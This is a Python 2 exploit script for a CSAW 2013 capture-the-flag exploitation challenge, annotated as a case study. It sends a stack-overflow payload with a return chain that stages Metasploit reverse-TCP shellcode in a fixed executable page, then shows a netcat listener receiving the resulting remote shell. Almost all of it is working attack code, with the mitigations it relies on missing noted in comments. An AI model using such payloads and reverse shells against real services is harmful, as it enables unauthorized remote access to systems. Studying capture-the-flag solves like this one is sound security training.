"""CSAW 2013 Exploitation Level 3 -- write-up script (Python 2).

Walks the challenge service's prompts, then sends a stack-smashing payload
whose return address chain calls the binary's own recv() to copy a second
message (the shellcode) into a fixed writable+executable page and returns
into it.  Every address is hard-coded for the challenge binary, so this is a
record of one solve rather than reusable tooling.

Read as a case study, the technique depends on the absence of the usual
mitigations: a fixed (non-PIE) address space, no stack canary in front of the
saved ebp/return address, and an rwx page to land in.  NX/W^X, PIE+ASLR and
stack protector would each break a different step of the chain.

Python 2 only: ``print`` statements, ``raw_input`` and a ``str`` shellcode.
"""
from struct import pack, unpack
from socket import *
import time
# Little-endian 32-bit pack/unpack helpers (x86 target).  `up` is unused below.
p = lambda x : pack("<I", x)
up = lambda x : unpack("<I", x)[0]
# Challenge service as used in the original run (lab-network address).
HOST = "192.168.0.109"
PORT = 34266
# linux/x86/shell_reverse_tcp - 95 bytes
# http://www.metasploit.com
# NOTE(review): the connect-back listener is encoded inside these bytes, not
# derived from HOST/PORT; the transcript at the bottom shows it was port 12071.
shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8"
"\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80"
"\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01"
"\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16"
"\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f"
"\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0"
"\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66")
# Fixed addresses inside the challenge binary (presumably read off a
# disassembly; the 0x0804xxxx range is a non-PIE x86 ELF).
freespace = 0x0804b000 # rwx
recv = 0x08048890   # presumably recv()'s PLT entry; first return target of the chain
pr = 0x08048943     # presumably a pop;ret gadget (the name suggests it) -- see payload notes
offset = 0x41c      # bytes from the overflowed buffer to saved ebp; NOTE: the literal is repeated below instead of this name
print "[*] CSAW Exploitation Level3 Exploit" # by sweetchip
# Walk the service's prompts.  Each recv(4096) reads one banner/prompt; the
# two replies are the challenge credentials, "-1" is presumably the menu
# choice that reaches the overflowing read -- TODO confirm against the binary.
s = socket(AF_INET,SOCK_STREAM)
s.connect((HOST,PORT))
print s.recv(4096)
print s.recv(4096)
s.send("csaw2013")
print s.recv(4096)
s.send("S1mplePWD")
print s.recv(4096)
s.send("-1")
print s.recv(4096)
time.sleep(1)
# Stack layout after the overwrite (x86, cdecl):
#   [0x41c filler][saved ebp][ret -> recv][ret-after-recv -> pr][4][freespace][len][0]
# So recv(4, freespace, len(shellcode), 0) copies the next send() into the
# rwx page.  When recv returns to `pr`, one pop consumes the fd slot and the
# ret lands on `freespace`, i.e. the freshly staged shellcode.
# fd 4 assumes the accepted client socket is descriptor 4 in the server
# process -- TODO confirm; this is what makes the second send() land.
payload = "A"*(0x41c+4) # ebp
payload += p(recv) # rop_start
payload += p(pr)
payload += p(4)
payload += p(freespace)
payload += p(len(shellcode))
payload += p(0)
s.send(payload)
# Second message: consumed by the recv() call set up in the chain above.
s.send(shellcode)
# Keep the connection open until Enter; the reverse shell arrives on a
# separate listener, as the transcript below shows.
raw_input("\ngive me shell! > ")
# Session transcript from the original run (a bare string literal, not executed).
"""
C:\Users\Administrator>nc -lvp 12071
listening on [any] 12071 ...
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.0.93] from (UNKNOWN) [192.168.0.1] 51765: NO_DATA
whoami
sweetchip
"""